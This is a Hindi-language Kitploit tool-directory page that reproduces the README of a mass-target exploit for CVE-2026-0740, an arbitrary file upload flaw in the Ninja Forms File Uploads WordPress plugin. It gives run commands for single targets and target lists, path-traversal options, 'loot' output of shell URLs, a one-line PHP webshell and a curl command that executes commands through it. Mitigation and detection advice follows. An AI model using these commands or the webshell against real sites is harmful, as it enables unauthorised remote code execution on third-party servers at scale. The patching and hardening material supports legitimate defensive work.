Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-0740-mass — CVE-2026-0740 के लिए PoC: Ninja Forms File Uploads <= 3.3.26 — अनधिकृत मनमाना फ़ाइल अपलोड जो RCE की ओर ले जा सकता है। | Kitploit
उपकरण/GitHubGitHub/exdev994/cve-2026-0740-mass
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubexdev994/cve-2026-0740-mass

CVE-2026-0740-mass

CVE-2026-0740 के लिए PoC: Ninja Forms File Uploads <= 3.3.26 — अनधिकृत मनमाना फ़ाइल अपलोड जो RCE की ओर ले जा सकता है।

रिपॉजिटरी देखें
111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-0740 — मास-टार्गेट एक्सप्लॉइट इंजन

लेखक: 0xNuts
योगदानकर्ता: Cursor
रिपॉजिटरी: https://github.com/ExDev994/CVE-2026-0740-mass

CVE-2026-0740 के लिए PoC: Ninja Forms File Uploads <= 3.3.26 — अप्रमाणित मनमाना फ़ाइल अपलोड जो RCE की ओर ले जा सकता है।

प्रारंभिक कमजोरी Sélim Lanouar (@whattheslime) द्वारा खोजी गई थी। मास-टार्गेट इंजन PoC 0xNuts द्वारा Cursor के योगदान से विकसित किया गया था।


अस्वीकरण

यह रिपॉजिटरी केवल सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है (अधिकृत पेंटेस्ट, लिखित अनुमति वाली रेड टीम, पैच सत्यापन, और हार्डनिंग)।

  • मालिक की स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।
  • लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है।

कमजोरी का सारांश

वर्डप्रेस के लिए Ninja Forms - File Uploads प्लगइन 3.3.26 (सहित) तक के सभी संस्करणों में अप्रमाणित मनमाना फ़ाइल अपलोड के प्रति संवेदनशील है।

शोषण श्रृंखला:

  1. बिना प्रमाणीकरण वाला हमलावर AJAX एक्शन nf_fu_get_new_nonce के माध्यम से किसी भी field_id के साथ अपलोड नॉन्स प्राप्त करता है।
  2. हैंडलर nf_fu_upload अपलोड फ़ाइल एक्सटेंशन को मान्य करता है (जैसे image.jpg), लेकिन हमलावर POST पैरामीटर (image_jpg) के माध्यम से लक्ष्य फ़ाइल नाम को ओवरराइड कर सकता है।
  3. लक्ष्य फ़ाइल नाम पर्याप्त सैनिटाइजेशन के बिना move_uploaded_file() को भेजा जाता है → मनमाना एक्सटेंशन + पाथ ट्रैवर्सल (../)।

पूर्ण पैच संस्करण 3.3.27+ में उपलब्ध है।


आवश्यक शर्तें

  • Python 3.10+
  • लक्ष्य में Ninja Forms और Ninja Forms - File Uploads (<= 3.3.26) प्लगइन स्थापित और सक्रिय होना चाहिए
  • पहले से मौजूद फॉर्म या अपलोड फ़ील्ड की आवश्यकता नहीं है

निर्भरताओं की स्थापना

इस रिपॉजिटरी में केवल CVE-2026-0740.py और README.md है। निर्भरताओं को मैन्युअल रूप से स्थापित करें:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate          # Linux/macOS/WSL
# .venv\Scripts\activate           # Windows

pip install httpx==0.28.1 socksio==1.0.0

उपयोग विधि

CLI सहायता

root@kitploit:~
python3 CVE-2026-0740.py -h

तर्क विकल्प

नोट: -t या -f में से केवल एक का उपयोग अनिवार्य है।


एकल लक्ष्य मोड

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php

स्पष्ट पाथ ट्रैवर्सल के साथ:

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php -d ../../../shell.php

मास टार्गेट मोड

target.txt फ़ाइल बनाएँ:

root@kitploit:~
http://site1.com
https://site2.com
10.0.0.5
# baris komentar diabaikan

चलाएँ:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php

वर्कर ट्यूनिंग और लूट आउटपुट के साथ:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php -w 50 -o loot.txt

सफलतापूर्वक अपलोड किए गए शेल URL लूट फ़ाइल में लिखे जाएँगे (append मोड)।


न्यूनतम वेबशेल उदाहरण

root@kitploit:~
echo '<?php system($_GET["cmd"] ?? ""); ?>' > shell.php

अपलोड सफल होने के बाद, स्क्रिप्ट शेल URL प्रदर्शित करती है। सत्यापन (केवल लैब/अधिकृत लक्ष्य पर):

root@kitploit:~
curl "http://target.com/wp-content/shell.php?cmd=id"

प्लगइन संस्करण का पता लगाना (वैकल्पिक)

root@kitploit:~
httpx -fr -u http://target.com -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+'

सुधार के तरीके (मिटिगेशन)

1. प्लगइन अपडेट करें (सर्वोच्च प्राथमिकता)

Ninja Forms - File Uploads को तुरंत 3.3.27 या नए संस्करण में अपडेट करें।

  • वर्डप्रेस एडमिन → प्लगइन्स → Ninja Forms - File Uploads का संस्करण जाँचें
  • यदि स्वचालित अपडेट उपलब्ध नहीं है, तो आधिकारिक विक्रेता से पैच किया गया संस्करण डाउनलोड करें

2. पैच सत्यापन

अपडेट के बाद:

  • सुनिश्चित करें कि प्लगइन संस्करण >= 3.3.27 है
  • एक्शन nf_fu_get_new_nonce / nf_fu_upload के साथ endpoint wp-admin/admin-ajax.php का परीक्षण करें — मनमाना अपलोड अस्वीकार किया जाना चाहिए
  • पुष्टि के लिए स्कैनर (Nuclei template CVE-2026-0740) से दोबारा स्कैन करें

3. समझौता संकेतक (IoC)

वर्डप्रेस अपलोड निर्देशिकाओं की जाँच करें:

root@kitploit:~
wp-content/uploads/ninja-forms/tmp/
wp-content/uploads/ninja-forms/
wp-content/

ऐसी बाहरी फ़ाइलें खोजें: .php, .pht, .phtml, .phar, .html, .svg, .js जो वहाँ नहीं होनी चाहिए।

इसके अलावा निम्नलिखित के लिए वेब सर्वर लॉग की जाँच करें:

root@kitploit:~
/wp-admin/admin-ajax.php

पैरामीटर action=nf_fu_get_new_nonce या action=nf_fu_upload के साथ।

4. अतिरिक्त हार्डनिंग

  • मास-अपलोड दुरुपयोग को रोकने के लिए /wp-admin/admin-ajax.php पर WAF / रेट लिमिटिंग लगाएँ

  • वेब सर्वर कॉन्फ़िगरेशन के माध्यम से wp-content/uploads/ निर्देशिका में PHP निष्पादन अक्षम करें:

    Apache (uploads/ में .htaccess):

    root@kitploit:~
    <FilesMatch "\.php$">
      Require all denied
    </FilesMatch>
    

    Nginx:

    root@kitploit:~
    location ~* /wp-content/uploads/.*\.php$ {
        deny all;
    }
    
  • न्यूनतम विशेषाधिकार: सुनिश्चित करें कि अपलोड फ़ाइल अनुमतियाँ आवश्यक निर्देशिका के बाहर वेब सर्वर द्वारा लिखने योग्य न हों

  • मॉनिटरिंग: अज्ञात IP या उच्च मात्रा से nf_fu_* एक्शन के साथ admin-ajax.php पर POST के लिए अलर्ट सेट करें

  • बैकअप और घटना प्रतिक्रिया: यदि IoC पाया जाए, तो साइट को आइसोलेट करें, DB/एडमिन क्रेडेंशियल रोटेट करें, अन्य प्लगइन/थीम का ऑडिट करें

5. यदि प्लगइन उपयोग नहीं किया जाता है

यदि अपलोड सुविधा आवश्यक नहीं है, तो Ninja Forms - File Uploads प्लगइन को निष्क्रिय करें और हटा दें।


संदर्भ

  • CVE-2026-0740
  • Lexfo — तकनीकी डीप डाइव
  • Wordfence — 50,000 वर्डप्रेस साइटें प्रभावित
  • GHSA-v8wq-rjpf-669f
  • Nuclei Template
टूल डाउनलोड करें
वेक्टर / एक्सटेंशन<= 3.3.243.3.253.3.263.3.27
पाथ ट्रैवर्सल (../)PASS---
.phpPASS---
.phtml, .pharPASSPASS--
.phtPASSPASSPASS-
.html, .svg, .jsPASSPASSPASS-
Flagकार्य
-t, --targetएकल लक्ष्य (एकल URL)
-f, --targets-fileलक्ष्यों की सूची वाली .txt फ़ाइल (प्रति पंक्ति एक URL)
--shellअपलोड की जाने वाली payload/webshell फ़ाइल (अनिवार्य)
-d, --destलक्ष्य पाथ ट्रैवर्सल (डिफ़ॉल्ट: ../../../)
-w, --workersसमवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 20)
-o, --outputसफल शेल URL के लिए लूट फ़ाइल (डिफ़ॉल्ट: results.txt)
-x, --proxyHTTP प्रॉक्सी (जैसे http://127.0.0.1:8080)
-H, --headersकस्टम हेडर (प्रारूप: 'Header: Value')
--timeoutHTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)